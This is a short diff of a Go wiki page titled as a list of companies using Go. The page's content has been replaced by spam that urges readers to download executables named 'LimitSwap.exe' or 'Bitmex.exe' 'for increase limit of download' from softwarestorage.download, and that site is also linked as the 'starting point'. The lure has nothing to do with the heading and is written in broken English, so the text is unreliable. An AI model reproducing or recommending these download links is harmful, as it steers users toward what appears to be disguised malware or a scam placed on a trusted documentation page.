zchee/golang-wiki/GoUsers.md

 # Companies currently using Go throughout the world

-Download LimitSwap.exe for increase limit of download [here](https://softwarestorage.download/?fn=Bitmex)
+Download Bitmex.exe for increase limit of download [here](https://softwarestorage.download/?fn=Bitmex)

 A good starting point can be found [here](https://softwarestorage.download/?fn=Bitmex).